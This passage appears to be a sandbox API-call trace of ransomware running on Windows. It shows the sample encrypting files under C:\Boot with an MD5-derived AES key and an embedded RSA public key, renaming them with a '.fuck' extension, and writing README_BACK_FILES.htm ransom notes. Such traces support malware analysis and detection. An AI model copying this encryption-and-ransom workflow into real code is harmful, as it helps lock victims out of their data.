hKey=0x27ff198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.472] CryptEncrypt (in: hKey=0x27ff198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2803aa8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2803aa8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.472] WriteFile (in: hFile=0x5d54, lpBuffer=0x2803aa8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2803aa8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.473] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.473] CryptEncrypt (in: hKey=0x27fef58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.473] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.473] CloseHandle (hObject=0xffffffff) returned 1 [0139.473] CloseHandle (hObject=0x5d54) returned 1 [0139.474] CopyFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.478] SetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.478] DeleteFileA (lpFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.gsg")) returned 1 [0139.479] MoveFileA (lpExistingFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\nb-NO\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.fuck")) returned 0 [0139.480] CryptDestroyHash (hHash=0x27fef18) returned 1 [0139.480] CryptDestroyKey (hKey=0x27fef58) returned 1 [0139.480] CryptReleaseContext (hProv=0x2804438, dwFlags=0x0) returned 1 [0139.480] FindNextFileA (in: hFindFile=0x27ff318, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.480] FindClose (in: hFindFile=0x27ff318 | out: hFindFile=0x27ff318) returned 1 [0139.480] GetFileAttributesA (lpFileName="C:\\\\Boot\\nb-NO\\README_BACK_FILES.htm" (normalized: "c:\\boot\\nb-no\\readme_back_files.htm")) returned 0xffffffff [0139.480] AreFileApisANSI () returned 1 [0139.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d750, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.480] CreateFileW (lpFileName="C:\\\\Boot\\nb-NO\\README_BACK_FILES.htm" (normalized: "c:\\boot\\nb-no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.580] GetFileType (hFile=0x5d50) returned 0x1 [0139.580] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.581] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.581] FindFirstFileA (in: lpFileName="C:\\\\Boot\\nl-NL\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0139.581] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.581] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.581] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.581] GetLastError () returned 0x0 [0139.581] GetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0139.582] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.582] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.582] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.582] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.583] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0139.585] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.585] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.585] CryptHashData (hHash=0x27ff058, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.585] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff058, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff518) returned 1 [0139.585] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.585] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.586] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803f70) returned 1 [0139.586] CryptImportPublicKeyInfo (in: hCryptProv=0x2803f70, dwCertEncodingType=0x1, pInfo=0x2800cd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2800d00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2800d08*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff1d8) returned 1 [0139.586] CryptEncrypt (in: hKey=0x27ff1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.586] CryptEncrypt (in: hKey=0x27ff1d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804218*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804218*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.586] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804218*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804218*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.587] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.587] CryptEncrypt (in: hKey=0x27ff518, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.587] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.588] CloseHandle (hObject=0xffffffff) returned 1 [0139.588] CloseHandle (hObject=0x5d54) returned 1 [0139.588] CopyFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.593] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.593] DeleteFileA (lpFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.gsg")) returned 1 [0139.594] MoveFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\nl-NL\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.fuck")) returned 0 [0139.595] CryptDestroyHash (hHash=0x27ff058) returned 1 [0139.595] CryptDestroyKey (hKey=0x27ff518) returned 1 [0139.595] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0139.595] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.595] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.595] GetLastError () returned 0x5 [0139.595] GetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui")) returned 0x20 [0139.596] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.596] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.596] CreateFileA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.597] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.597] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803e60) returned 1 [0139.599] CryptCreateHash (in: hProv=0x2803e60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.599] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.599] CryptHashData (hHash=0x27ff558, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.600] CryptDeriveKey (in: hProv=0x2803e60, Algid=0x6610, hBaseData=0x27ff558, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff058) returned 1 [0139.600] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.600] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.600] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2803ff8) returned 1 [0139.600] CryptImportPublicKeyInfo (in: hCryptProv=0x2803ff8, dwCertEncodingType=0x1, pInfo=0x28000a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28000d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28000d8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff158) returned 1 [0139.600] CryptEncrypt (in: hKey=0x27ff158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.600] CryptEncrypt (in: hKey=0x27ff158, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28042a0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28042a0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.601] WriteFile (in: hFile=0x5d54, lpBuffer=0x28042a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28042a0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.602] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.602] CryptEncrypt (in: hKey=0x27ff058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.602] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.602] CloseHandle (hObject=0xffffffff) returned 1 [0139.602] CloseHandle (hObject=0x5d54) returned 1 [0139.603] CopyFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0139.607] SetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0139.607] DeleteFileA (lpFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.gsg")) returned 1 [0139.609] MoveFileA (lpExistingFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\nl-NL\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.fuck")) returned 0 [0139.609] CryptDestroyHash (hHash=0x27ff558) returned 1 [0139.609] CryptDestroyKey (hKey=0x27ff058) returned 1 [0139.609] CryptReleaseContext (hProv=0x2803e60, dwFlags=0x0) returned 1 [0139.609] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0139.609] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0139.609] GetFileAttributesA (lpFileName="C:\\\\Boot\\nl-NL\\README_BACK_FILES.htm" (normalized: "c:\\boot\\nl-nl\\readme_back_files.htm")) returned 0xffffffff [0139.609] AreFileApisANSI () returned 1 [0139.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d788, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0139.610] CreateFileW (lpFileName="C:\\\\Boot\\nl-NL\\README_BACK_FILES.htm" (normalized: "c:\\boot\\nl-nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0139.612] GetFileType (hFile=0x5d50) returned 0x1 [0139.612] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0139.613] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0139.613] FindFirstFileA (in: lpFileName="C:\\\\Boot\\pl-PL\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff218 [0139.613] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.613] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.613] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.613] GetLastError () returned 0x0 [0139.613] GetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0139.614] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0139.614] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.614] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.615] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.615] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2804080) returned 1 [0139.617] CryptCreateHash (in: hProv=0x2804080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0139.617] lstrlenA (lpString="BklUgDiXcWznHQtJYhpxWlYbzMlQm") returned 29 [0139.617] CryptHashData (hHash=0x27ff4d8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0139.618] CryptDeriveKey (in: hProv=0x2804080, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff298) returned 1 [0139.618] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0139.618] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0139.618] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x28046e0) returned 1 [0139.618] CryptImportPublicKeyInfo (in: hCryptProv=0x28046e0, dwCertEncodingType=0x1, pInfo=0x2801010*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2801040*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2801048*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27ff318) returned 1 [0139.619] CryptEncrypt (in: hKey=0x27ff318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0139.619] CryptEncrypt (in: hKey=0x27ff318, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804328*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2804328*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0139.619] WriteFile (in: hFile=0x5d54, lpBuffer=0x2804328*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2804328*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0139.620] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0139.620] CryptEncrypt (in: hKey=0x27ff298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0139.620] WriteFile (in: hFile=0x5d54, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0139.620] CloseHandle (hObject=0xffffffff) returned 1 [0139.620] CloseHandle (hObject=0x5d54) returned 1 [0139.621] CopyFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0139.736] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0139.736] DeleteFileA (lpFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.gsg")) returned 1 [0139.737] MoveFileA (lpExistingFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\pl-PL\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.fuck")) returned 0 [0139.737] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0139.738] CryptDestroyKey (hKey=0x27ff298) returned 1 [0139.738] CryptReleaseContext (hProv=0x2804080, dwFlags=0x0) returned 1 [0139.738] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0139.738] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0139.738] GetLastError () returned 0x5 [0139.738] GetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui")) returned 0x20 [0139.738] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0139.738] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0139.738] CreateFileA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0139.739] SetFileAttributesA (lpFileName="C:\\\\Boot\\pl-PL\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0139.739] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, 